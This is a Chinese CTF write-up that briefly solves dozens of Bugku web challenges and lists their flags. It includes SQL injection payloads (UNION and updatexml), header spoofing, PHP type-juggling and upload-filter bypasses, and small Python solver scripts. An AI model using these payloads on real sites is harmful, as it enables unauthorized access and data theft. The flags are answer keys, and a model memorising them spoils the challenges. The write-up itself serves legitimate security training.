Bugku CTF web题wp一句话

眉间皱痕 提交于 2020-02-26 09:13:12

0x00 web2

直接F12拿到flag

KEY{Web-2-bugKssNNikls9100}

0x01 计算器

F12修改maxlength=2得到flag

flag{CTF-bugku-0032}

0x02 web基础$_GET

提交GET参数?what=flag得到flag

flag{bugku_get_su8kej2en}

0x03 web基础$_POST

提交POST参数what=flag得到flag

flag{bugku_get_ssseint67se}

0x04 矛盾

num不能是纯数字且等于1,构造payload:num=1/1得到flag

flag{bugku-789-ps-ssdf}

0x05 web3

禁用js之后F12查看源码,里面有一串Unicode,解码得到flag

KEY{J2sa42ahJK-HS11III}

0x06 域名解析

本地路径C:\Windows\System32\drivers\etc,解析一下再访问flag.baidu.com得到flag

KEY{DSAHDSJ82HDS2211}

0x07 你必须让他停下

抓包send to Repeater 一直go直到flag出现

flag{dummy_game_1s_s0_popular}

0x08 变量1

var_dump($$args) 将$GLOBALS数组中存放的所有变量以数组方式输出

构造index1.php?args=$GLOBALS拿到flag

flag{92853051ab894a64f7865cf3c2128b34}

0x09 web5

把源码里那段jspfuck丢进控制台再转成大写得到flag

CTF{WHATFK}

0x0A 头等舱

抓包丢进Repeater里Go一下,flag在Response里

flag{Bugku_k8_23s_istra}

0x0B 网站被黑

御剑扫后台扫出一个shell.php,爆破得到密码为hack

flag{hack_bug_ku035}

0x0C 管理员系统

F12在最下面base64解码得到密码为test123,抓包添加X-Forwarded-For:127.0.0.1得到flag

flag{85ff2ee4171396724bae20c0bd851f6b}

0x0D web4

源代码里的东西urldecode拼接一下就得到a.value,提交得到flag

KEY{J22JK-HS11}

0x0E flag在index里

php伪协议读取index.php

flag{edulcni_elif_lacol_si_siht}

0x0F 备份是个好习惯

源码在index.php.bak,一道md5碰撞题。

key可以双写绕过,md()函数无法处理数组,传入数组返回null

或者利用==比较漏洞,md5加密后的值为0exxx会被认为是0的xxx次方

Bugku{OH_YOU_FIND_MY_MOMY}

0x10 成绩单

无任何过滤的sql注入

Payload:-1' union select 1,2,3,skctf_flag from fl4g#

BUGKU{Sql_INJECT0N_4813drd8hz4}

0x11 秋名山老司机

import requests
import re
url = 'http://123.206.87.240:8002/qiumingshan/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)

Bugku{YOU_DID_IT_BY_SECOND}

0x12 速度要快

import requests
import base64
url="http://120.24.86.145:8002/web6/"
r=requests.session()
headers=r.get(url).headers
 
mid=base64.b64decode(headers['flag'])
mid=mid.decode()
 
flag = base64.b64decode(mid.split(':')[1])
data={'margin':flag}
print (r.post(url,data).text)

KEY{111dd62fcd377076be18a}

0x13 never give up

urldecode->base64decode->urldecode得到源码

直接看f4l2a3g.txt就拿到flag了

flag{tHis_iS_THe_fLaG}

0x14 字符?正则?

Payload:http://123.206.87.240:8002/web10/?id=keykeyaaaakey:/a/keya:

KEY{0x0SIOPh550afc}

0x15 前女友

md5碰撞

SKCTF{Php_1s_tH3_B3St_L4NgUag3}

0x16 login1

sql约束攻击

SKCTF{4Dm1n_HaV3_GreAt_p0w3R}

0x17 你从哪里来

referer:https://www.google.com

flag{bug-ku_ai_admin}

0x18 md5 collision

还是md5碰撞

flag{md5_collision_is_easy}

0x19 程序员本地网站

X-Forwarded-For:127.0.0.1

flag{loc-al-h-o-st1}

0x1A 各种绕过

sha1碰撞,传数组进去返回null

**flag{HACK_45hhs_213sDD} **

0x1B web8

file_get_contents() 函数把整个文件读入一个字符串中

ac为flag.txt的内容,fn为flag.txt

flag{3cfb7a90fc0de31}

0x1C 细心

robots.txt下告诉我们有个resusl.php,传个x=admin就能拿到flag

flag(ctf_0098_lkji-s)

0x1D 求getshell

php5绕过+MIME+Content-type大小写绕过

php5这个后缀名bp fuzzing一下就出flag了

KEY{bb35dc123820e}

0x1E INSERT INTO注入

xff头时间盲注,python脚本跑一遍

flag{cdbf14c9551d5be5612f7bb5d2867853}

0x1F 多次

and、or、union、select都被过滤了,需要双写绕过

flag1是错的,爆flag1里的address得到下一关地址

payload:?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23

flag{Bugku-sql_6s-2i-4t-bug}

0x20 flag.php

key最开始为定义,所以为NULL。构造Cookie: ISecer = s:0:"";得到flag

flag{unserialize_by_virink}

0x21 sql注入2

.DS_Store文件泄露,web2/flag打开就是了。盲注要复杂些

flag{sql_iNJEct_comMon3600!}

0x22 Trim的日记本

目录扫描,flag在show.php

flag1:{0/m9o9PDtcSyu7Tt}

The end

好多题因为各种各样的原因挂掉了,挺可惜的

这份wp主要是为了整理一下web题的思路,需要有一定基础才能看懂

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!